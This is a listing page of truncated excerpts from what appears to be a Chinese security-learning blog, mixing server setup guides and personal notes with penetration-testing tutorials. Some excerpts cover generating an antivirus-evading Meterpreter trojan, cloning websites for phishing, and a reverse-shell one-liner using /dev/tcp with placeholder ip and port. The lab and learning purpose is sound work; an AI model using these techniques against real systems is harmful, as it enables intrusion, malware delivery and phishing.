原创 Ubuntu上搭建LAMP

一,搭建LAMP環境 1,Apache2 web服務器的安裝 apt install apache2  安裝Apache systemctl status apache2 檢查是否開啓apache,一般安裝完畢後會默認開啓 syste

原创 hackthebox註冊教程

官方網址:https://www.hackthebox.eu/ hackthebox是一個靶場,聽說和vulnhub很像,最近迷上了做靶場,於是就像去hackthebox看看,發現還是註冊,而且註冊好像還沒有那麼簡單 在首頁的最下面有個j

原创 MSF免殺木馬生成

啓動msfconsole 查看evasion模塊 選擇合適的模塊 use windows/windows_defender_exe  設置reverse_tcp payload set payload windows/meterpt

原创 Elasticsearch未授權訪問漏洞(Es未授權訪問)

     Elasticsearch是一個開源的高擴展的分佈式全文檢索引擎,它可以近乎實時的存儲、檢索數據;本身擴展性很好,可以擴展到上百臺服務器,處理PB級別的數據。Elasticsearch也使用Java開發並使用Lucene作爲其核

原创 kali-網站克隆工具-httrack

HTTrack是一款網站克隆工具,主要用戶克隆網站。滲透測試人員可以將目標網站克隆到本地進行查看,包含了所有的頁面和離線文件,是可以進行社會工程學攻擊,是釣魚網站的利器。 1,安裝  sudo apt-get isntall httarc

原创 kali linux更換源

切換到root用戶:sudo su 更改源: vim /etc/apt/sources.list 阿里源: deb http://mirrors.aliyun.com/kali kali-rolling main non-free

原创 一次簡單的域滲透

攻擊機:kali  192.168.44.131 軍事區:window7 192.168.44.139   192.168.4. 非軍事區: window server 2003  192.168.4. kali: 返回的連接可以使用ba

原创 Centos7搭建LNMP環境

之前搭建過lamp環境,考慮到高併發性還是使用LNMP環境搭建網站划算一些。先簡單的介紹一下Nginx Nginx 是一個免費的,開源的,高性能的 HTTP 服務器和反向代理,以及 IMAP / POP3 代理服務器。Nginx 以其高性

原创 科目二 學習筆記

對線:點位對着黃線,偏了之後,拉正,又偏了,又拉正,偏了,拉正。偏了,拉正。偏了,拉正。直到點位能順着黃線走。 一,倒車入庫 1,小鏡子對着黃線——肩膀前停車——掛倒檔 2,一指頭半距離——向右打死——當看不到虛線的時候回半圈——當車前寬

原创 xxe靶機

開始之前先回憶一下nmap 一直都知道nmap功能很強大,但是平時工作中就只用來掃描端口,漸漸的都忘記了其它的功能及使用方法,正好今天做靶場需要用nmap進行存活主機發現,總結下nmap的使用方法。 場景一:主機發現 nmap -sP 1

原创 內心突然的平靜

   我打小就是一個容易緊張的人,無論幹什麼都會緊張,可能是因爲從小自卑的原因吧。但是今天我找到了一種平靜,一種內心絕對的平靜,雖然內心依舊有很多的情況,但是無法在我心中掀起任何波瀾,我想要記錄下來這種平靜,想要保持這樣的一種平靜。  

原创 實驗——修改文件名會影響文件的MD5值嗎?

不知所以,腦海中突然浮現出了這個問題,修改文件名會改變文件的MD5值嗎?不妄斷,實驗出真知。 certutil -hashfile 1.txt md5可以計算出這個文件的哈希值 certutil -hashfile 1.txt sha1

原创 如何完善反彈的shell

在滲透過程中,我發現用nc -e反彈的shell一點兒都不好用,我都不會用,特別麻煩,特別容易影響滲透的效率與感情,因此我百度了很多,終於找到了完善反彈shell的方法。 python ‐c "import pty;pty.spawn('

原创 誰還活着-kali-主機探測

1,fping命令 掃描c段:fping -asg 192.168.44.0/24  掃描txt文件中的IP或域名:fping -asg nethost.txt a 只返回存活的IP s 顯示該掃描相關的統計信息 g 不顯示掃描過程,只

原创 詳解反彈shell命令

在滲透過程中,經常需要反彈shell,因此總結一下linux反彈shell的幾種姿勢: bash -i >&  /dev/tcp/ip/port 0>&1 bash -i 本地以交互模式打開一個bash >&  輸出重定向,將標準輸出和